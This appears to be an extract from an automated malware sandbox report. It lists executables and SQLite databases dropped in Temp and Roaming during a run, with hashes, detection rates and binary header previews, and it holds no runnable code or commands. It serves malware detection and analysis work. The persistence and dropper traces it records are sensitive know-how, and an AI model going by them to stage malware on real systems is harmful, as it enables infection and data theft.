                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................e......................................w.....w./....w.....Rich...........................PE..L...g..a.....................^.......Q............@..........................@...........@.................................\...<....p....................... ..P...................................(...@...............\............................text...|........................... ..`.rdata..(...........................@..@.data...X...........................@....rsrc........p.......@..............@..@.reloc..P.... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\2NOH4EKN
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6PZCBASJ
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                          Entropy (8bit):0.6970840431455908
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                                          MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                                          SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                                          SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                                          SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\7085.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):347136
                                                                                                                                                                                                          Entropy (8bit):6.230155743119187
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:gnjd+ZnJMz+HPYYys+J7huIPCUrM/YbKwj4Fy9FVUHc1FEu:gnjdZz2Qmm7huIPCUQ/YbKwjRFVUwFEu
                                                                                                                                                                                                          MD5:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          SHA1:F171845FE7B3AE9576EA0F698EDD8D65D6BF6EAD
                                                                                                                                                                                                          SHA-256:EB24B3B9375F0B3272FAC6EECC9329F79EAB274D802B2AD37037CC83A46FA3F1
                                                                                                                                                                                                          SHA-512:FD509B50E86B073A5CD15DBEA644BCD96CF6BECDE8EE8E1C1A3B6433F84D4825CC25CDC4DA68D4A5894491DE55CAB73DE1D5E24F3F479BD7459DFD415B93A22B
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L....YV_......................3......J.......0....@.......................... 8.................................................(....p7..N....................7.d"..0...................................@............................................text............................... ..`.data....*3..0......................@....fuhi........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7..X..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):350720
                                                                                                                                                                                                          Entropy (8bit):6.2451843570441765
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:RMe4If8UfSO1O1SvsmOYSf+hLyIR8r7/YbGTz4SdoFo1Cchs:RMe4IfTfSO1OMbOYE+hLyIR8H/YbGTz4
                                                                                                                                                                                                          MD5:A181F86F7191ED7680953213C7239305
                                                                                                                                                                                                          SHA1:D96EAB6E1D90BCAB904569AA8F5836FD7E6E53A3
                                                                                                                                                                                                          SHA-256:0B0F4588FA42DBDEF602EBEF393087FBDF6EC82110BB78C0CCB3035F0C6B68D5
                                                                                                                                                                                                          SHA-512:9DEAE05EDA48A1204FB402B3A32F3CD8781126C907C9F86AAE0B49BCBC59B1046145B0707960B10909FE623C38F6AF075F552623555CDBB466A743A511E577F5
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L....7._................. ....3.....@V.......0....@.......................... 8.....g...........................................(....p7..N....................7.L"..0...................................@............................................text...&........ .................. ..`.data....*3..0.......$..............@....cixi........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7..X..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\8A8A.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):347648
                                                                                                                                                                                                          Entropy (8bit):6.2297996342675255
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:KqoydvQ3tf1KZ6Hcplnva5hCIHosrx/Ybtr04P3ApE3f3CwsO:KqoyStf1KA8plnS5hCIHosF/Ybtr0xpu
                                                                                                                                                                                                          MD5:AD639AA5FF468BA6F8A7503FD5BF89BD
                                                                                                                                                                                                          SHA1:5C337AAB3F70D8E736B2DA54C4E2A59C6B6F3629
                                                                                                                                                                                                          SHA-256:492F084FCF04E9C8EA5E1B0D969A07A91916938C3F2968663F570604D0DE2AC4
                                                                                                                                                                                                          SHA-512:426D25103C8ECEDA89F43C0EF9C4A836CCADEA1D607CD0D1C43FC249160278568DA10AF60FE652DD106EE8B7EEB4E9327D70FB00A85B4C900812E66A6430381C
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L...d.`......................3.....PK.......0....@.......................... 8.................................................(....p7..N....................7.d"..0...................................@............................................text...6........................... ..`.data....*3..0......................@....vupa........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7..X..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):537600
                                                                                                                                                                                                          Entropy (8bit):5.8353234707233534
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:Un/FdRmmTOPQg0BQq+ODwMbIhZfzSxw/HelHAavv5c:Utm3KWGEQ5
                                                                                                                                                                                                          MD5:7FCE0E163EA7948C10B044B1EA77DAD9
                                                                                                                                                                                                          SHA1:93FF44509842641664B2780D46D50F42ED3C4CFD
                                                                                                                                                                                                          SHA-256:EE46E43181CA94A5AF22009D769CFAFDB3DE2E7ECF77BE553E49AC57659D3100
                                                                                                                                                                                                          SHA-512:2E7C2852DE5CE7872EF970B99C27E184A93CB8081D9E130A62A36B96A91BFA26CEDD408FC7EC091C8562258AECFB85434073782A304B059F4699200F67FA6FCA
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..,...........J... ...`....@.. ....................................@..................................I..K....`............................................................................... ............... ..H............text....*... ...,.................. ..`.rsrc........`......................@....reloc...............2..............@..B.................I......H............?...........X...............................................(....*..0..1.......8....*(f...8.....~....u....s....z&8.........8................!..........*.......*....(f...(....*...j*.......*.......*.......*.......*....(....*..(....8....(.........8....*(....8...........*.......*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\AI58QQIW
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):73728
                                                                                                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\DJMYU3EC
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8132.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):118784
                                                                                                                                                                                                          Entropy (8bit):0.4589421877427324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                                                                                                                                                          MD5:16B54B80578A453C3615068532495897
                                                                                                                                                                                                          SHA1:03D021364027CDE0E7AE5008940FEB7E07CA293C
                                                                                                                                                                                                          SHA-256:75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
                                                                                                                                                                                                          SHA-512:C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\F338.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):756224
                                                                                                                                                                                                          Entropy (8bit):7.417539689136751
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:2RvV5sIQ1WZKgR5BNlg4eiAcnEtAfyvVtuq1XqbI3/h2W9UYw1p7sBeug:2v5nQ1gycEQIVkAXq6UYw1A
                                                                                                                                                                                                          MD5:F148850575EB0825A5B94C0862B22B3B
                                                                                                                                                                                                          SHA1:C18CCF1750860117EA69955BC155BA6D152CF4AF
                                                                                                                                                                                                          SHA-256:DFAEDE00DF102E0E4117A2732CCDBA401DB15662AABE13D9B7E60C87E032E8C2
                                                                                                                                                                                                          SHA-512:858B0E4A91742AB707A11FEA86580D8604E7E0348B8F83A978DA76848E2BE5D9D5C2C6F60ADCDDEB54A86B4F714C29803DAEAAC6C74FDFE18CC55A0DDF639235
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .)B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L....._.................L....3..............`....@..........................PH......x......................................dJ..(.....=..N....................G.H"..@...................................@............................................text....J.......L.................. ..`.data....*3..`.......P..............@....bajut........=.....................@....rsrc....N....=..P..................@..@.reloc...Z....G..\..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\FFBD.exe
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:MS-DOS executable
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1578128
                                                                                                                                                                                                          Entropy (8bit):7.948639879741402
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:dQLiznQsIMreKKF1avBHrqvN1WTE9xoWraj+pA/sBCrr:d/ssIFK3vZrKr9xNWipJW
                                                                                                                                                                                                          MD5:4EAA33016932917B18A724B4286C47ED
                                                                                                                                                                                                          SHA1:14397DE6CD66B70334EAA6FB3A325440319A09FA
                                                                                                                                                                                                          SHA-256:358DF1BB52105CE30242C792642DB87DBC525A1BCFD5AD7FE5DA247F1489028E
                                                                                                                                                                                                          SHA-512:43651B18BE842C34834EBFE7575E29DA78581933001FF088032E97FB15E28D863EB30798007794C307F306C751CB48077BC7057149C83BFC6CF24D5853410737
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L......a.............................P?......@....@...........................@.....c.....@..................................@=.X....P=..............................................................................................................adata...0=............................`.adata.......@=.....................@....rsrc........P=.....................@..@.text........P?.Q}..................@.....................................................................................................................................................................................................................................................................................................................q&..Z.E...F..WPv....+..Y.5ta
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\atingifo.exe
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\8A8A.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11656704
                                                                                                                                                                                                          Entropy (8bit):3.598241438885829
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:26SbKFrS57Ybtr0m10000000000000000000000000000000000000000000000n:6
                                                                                                                                                                                                          MD5:1A995C233549FD2389D902B2E1F2413D
                                                                                                                                                                                                          SHA1:A4C51A030E691BAE892E1042FBCC2FD05D3E9C92
                                                                                                                                                                                                          SHA-256:7E890AC9AF0630F04AC9EB1471C694D8682824B31CB8B868E43ECE0E02B0712F
                                                                                                                                                                                                          SHA-512:640EC203A1317D9E64C6ABE6314B42537CC8A6716F68ED64CF301B982A97EBF5484C72DC14E91B2C37F47BA236EA1839C78BFE538FBDC03827B52D46FD7525B4
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L...d.`......................3.....PK.......0....@.......................... 8.................................................(....p7..N....................7.d"..0...................................@............................................text...6........................... ..`.data....*3..0......................@....vupa........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7....................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@ (copy)
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.11034894197500378
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:26zEtCXm/Ey6q99950Mq3qQ10nMCldimE8eawHjcXvti:26zYl682LyMCldzE9BHjcXU
                                                                                                                                                                                                          MD5:93FB3C24628984FFB890FA6E9C31EEA4
                                                                                                                                                                                                          SHA1:40A2B992DF6BB6D7CF75813A91405B104C83D4AC
                                                                                                                                                                                                          SHA-256:491517DF9ECA37645A12CCD8CA20FFBCD99DA62DF52977735421CAE41BF82915
                                                                                                                                                                                                          SHA-512:2C47D0123197AD01A6339BB666ECD0ED430EAC378409077968D7E917E3F34107F7F8A9F60BDA2B1DE348DC6B58C0EF7A2D0E0435A428D7625C08514BA31FE062
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ...................S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.H.......;%......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.1128246090353552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:CXm/Ey6q9995T1miM3qQ10nMCldimE8eawHza1miIAl/N:Xl68F1tMLyMCldzE9BHza1tIm/N
                                                                                                                                                                                                          MD5:AFDA996CEB50726FE3B00B09EEB54120
                                                                                                                                                                                                          SHA1:672EE4FA5993C6B7D1B6BE46AFFEF34367E11268
                                                                                                                                                                                                          SHA-256:67B4CC0078AEDC5D14BD8B4C56E30F8640D75141D283236FF5AAE7BB79CFB957
                                                                                                                                                                                                          SHA-512:4059C02B51D0F34896A8C88E8E3E49E7217E73E5A080017105AC5B32DD7B9A65D0EB0C908E92A3ADAF18E799A068CF5E3CE50BA68870C6493EC3AFD8AD586496
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ......|.............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.H.......Z.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001WS (copy)
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.11267753938905724
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:EjXm/Ey6q9995N1mK2P3qQ10nMCldimE8eawHza1mKsP:Bl68/1iPLyMCldzE9BHza1w
                                                                                                                                                                                                          MD5:B1FE45F725CCF2AFB6A9687A61D6D202
                                                                                                                                                                                                          SHA1:3874ED630E52817EBEC1452A4F98E647A3BEE934
                                                                                                                                                                                                          SHA-256:0A7778967A1AD592BC00F0BF290B493DD8C6B0059F27A417041DF76B2A3C7DE0
                                                                                                                                                                                                          SHA-512:7460E6062684CEAE91CE31D1D95E369A2597931912A8018BFA7C20036B40A7820AEE4B64B575F0AF777F86FC03CDE83F8999D4A1B49BE8AC3776F1F553637677
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: ................................................................................H................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................5....... ......U.............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.H...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\ahtdegs
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):347136
                                                                                                                                                                                                          Entropy (8bit):6.230155743119187
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:gnjd+ZnJMz+HPYYys+J7huIPCUrM/YbKwj4Fy9FVUHc1FEu:gnjdZz2Qmm7huIPCUQ/YbKwjRFVUwFEu
                                                                                                                                                                                                          MD5:720B195655E0A571C4D511088B51202B
                                                                                                                                                                                                          SHA1:F171845FE7B3AE9576EA0F698EDD8D65D6BF6EAD
                                                                                                                                                                                                          SHA-256:EB24B3B9375F0B3272FAC6EECC9329F79EAB274D802B2AD37037CC83A46FA3F1
                                                                                                                                                                                                          SHA-512:FD509B50E86B073A5CD15DBEA644BCD96CF6BECDE8EE8E1C1A3B6433F84D4825CC25CDC4DA68D4A5894491DE55CAB73DE1D5E24F3F479BD7459DFD415B93A22B
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L....YV_......................3......J.......0....@.......................... 8.................................................(....p7..N....................7.d"..0...................................@............................................text............................... ..`.data....*3..0......................@....fuhi........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7..X..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\ahtdegs:Zone.Identifier
                                                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):9062
                                                                                                                                                                                                          Entropy (8bit):3.1640091343701506
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+u:j+s+v+b+P+m+0+Q+q+K+u
                                                                                                                                                                                                          MD5:F4BA0407D902EC57EE47C7360375032F
                                                                                                                                                                                                          SHA1:78C3473D6D2EA6931FB3F4A6E974676DA5FC3191
                                                                                                                                                                                                          SHA-256:C7C376BBD075C63595C9918E620AA0D02112FE78D92535984FF5471340C37614
                                                                                                                                                                                                          SHA-512:E82118F83F7985354EB6AB1E831EA507D1580F96209144F549DA2416E1B187FDAC26AE6D3F7E46F292B1656131B5FA51327D53CCBBC2826E838BAE895B5672BF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
